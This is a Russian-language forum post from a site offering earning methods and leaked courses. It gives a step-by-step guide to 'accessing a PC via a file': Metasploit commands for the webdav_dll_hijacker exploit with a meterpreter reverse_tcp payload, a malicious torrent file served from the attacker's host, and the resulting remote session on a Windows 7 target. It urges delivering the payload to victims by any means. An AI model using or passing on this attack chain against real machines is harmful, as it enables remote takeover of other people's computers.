• VLMI - форум по обмену информацией. На форуме можете найти способы заработка, разнообразную информацию по интернет-безопасности, обмен знаниями, курсы/сливы.

    После регистрации будут доступны основные разделы.

    Контент форума создают пользователи, администрация за действия пользователей не несёт ответственности, отказ от ответственности. Так же перед использованием форума необходимо ознакомиться с правилами ресурса. Продолжая использовать ресурс вы соглашаетесь с правилами.
  • Подпишись на наш канал в Telegram для информации о актуальных зеркалах форума: https://t.me/vlmiclub

Доступ к ПК с помощью файла (torrent)

Дима22

Эксперт
Сообщения
596
Реакции
507
0 руб.
С этой задачей нам поможет справиться Kali Linux 2016.2 Rolling и наличие обновленного Metasploit Framework. В качестве целевого хоста, я буду использовать десктоп с установленной Windows 7.


Итак, запустив Metasploit, вводим следующее:

> use exploit/windows/browser/webdav_dll_hijacker (Выбираем эксплоит)

> msf exploit(webdav_dll_hijacker) >set payload windows/meterpreter/reverse_tcp (Выбираем тип полезной нагрузки)

> set lhost 192.168.0.104 (Определим адрес атакующего хоста)

> set extensions torrent (Выберем тип расширения файла)

> exploit (Запустим работу фреймворка)
upload_2017-4-18_21-44-41.png


Далее, запускается веб-сервер, на атакующем хосте, а по адресу 192.168.0.104\documents\ - будет находиться полезная нагрузка, наша задача состоит в том, чтобы используя всевозможные методы доставить ее на целевой хост.

upload_2017-4-18_21-44-57.png



Откроем на целевом хосте строку “Выполнить” и впишем туда адрес, по которому находится полезная нагрузка:
upload_2017-4-18_21-45-13.png



В консоли атакующего хоста видим сигнализационные сообщения:upload_2017-4-18_21-45-31.png



Затем, в открывшемся окне на целевом хосте можно наблюдать сгенерированный Metasploit торрент-файл:
upload_2017-4-18_21-45-46.png



После его запуска, откроется активная сессия meterpreter:
upload_2017-4-18_21-46-0.png


Проверка -
upload_2017-4-18_21-46-16.png


В опциях эксплойта, можно изменить директорию и название полезной нагрузки:upload_2017-4-18_21-46-30.png


При попытке применить эксплоит к Windows 8.1:
upload_2017-4-18_21-46-47.png

Так же реагирует и Windows 10, полагаю дело в обновлении, которое закрыло критические уязвимости в Windows.
 

Вложения

  • upload_2017-4-18_21-44-41.png
    upload_2017-4-18_21-44-41.png
    41,7 KB · Просмотры: 56
  • upload_2017-4-18_21-44-57.png
    upload_2017-4-18_21-44-57.png
    24,6 KB · Просмотры: 49
Сверху Снизу